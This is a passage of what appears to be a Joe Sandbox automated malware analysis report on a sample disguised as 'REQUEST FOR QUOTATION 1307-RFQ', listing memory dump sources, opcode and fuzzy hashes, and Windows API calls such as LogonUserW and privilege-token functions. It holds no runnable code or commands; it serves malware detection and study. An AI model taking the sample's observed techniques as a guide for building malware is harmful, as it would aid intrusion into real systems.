                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 81990902-0
                                                                                                                                                                                                                              • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                                                                                              • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                                                                                              • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 7=t>$::1
                                                                                                                                                                                                                              • API String ID: 0-44347883
                                                                                                                                                                                                                              • Opcode ID: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                                                                                                                                                                                                              • Instruction ID: 7b7b9097778334d66284af357e74a9697944564908916f1dfc4a80b1b8541c73
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351CF319897C59FDF228AB888953D67FA3AF472183DA00DBC4C14E05BD62595C7CB4B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                                                                                              • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                                                                                              • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B2399E,?,?,00000008,?,?,00B21CF4,00000000), ref: 00B23BD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: 9ec2796eafca133d17bdb62c0abb758dd6d43bc4a9c7f7ae6bf05794871207e3
                                                                                                                                                                                                                              • Instruction ID: 952e2e1f4bf218d3110f8f71b750d3eea9236b955e64f16b720963bf395e1da2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec2796eafca133d17bdb62c0abb758dd6d43bc4a9c7f7ae6bf05794871207e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6B14B312106189FD715CF28D48AB657BE0FF45764F258698E9DECF2A1C339DA92CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2434400541-0
                                                                                                                                                                                                                              • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                                                                                              • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LogonUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1244722697-0
                                                                                                                                                                                                                              • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                                                                                              • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                                                                                              • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bc937d9efc4df9bdead30ab40352ee8d7fb7f90e165429668f94f932763b6f72
                                                                                                                                                                                                                              • Instruction ID: fcb9388af2914be0bb5c23a0c71657a5308f68cbb3e6edcc38097995d0b783f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc937d9efc4df9bdead30ab40352ee8d7fb7f90e165429668f94f932763b6f72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22822D76B083108FD748DF18D89075EF7E2ABC8314F1A893DA999E3354DA74EC518B86
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2361a7c982f7af7a33cec537b194c2a17d376aca1ac0b799964a255fa8ef7725
                                                                                                                                                                                                                              • Instruction ID: 0e7529edb7b5de155d33244b34a2e11b70f3c2977303d1bf687ee831b7d77e49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2361a7c982f7af7a33cec537b194c2a17d376aca1ac0b799964a255fa8ef7725
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B832E432D35F114DD7236634D86232A6289AFB73D5F25D737E81AB6DA6EF28C4835200
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                                                                                              • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                                                                              • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                                                                                              • Instruction ID: a48837bc0b64d9f1e9637377a7f77aa0dff17b39c342accc43a0f4b8ba463199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                                                                              • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                                                                                              • Instruction ID: ae45d7d530e7b120333fe7091fa81a97f5d7525ab0efcf572022106cc673615b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAA192B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                                                                                              • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
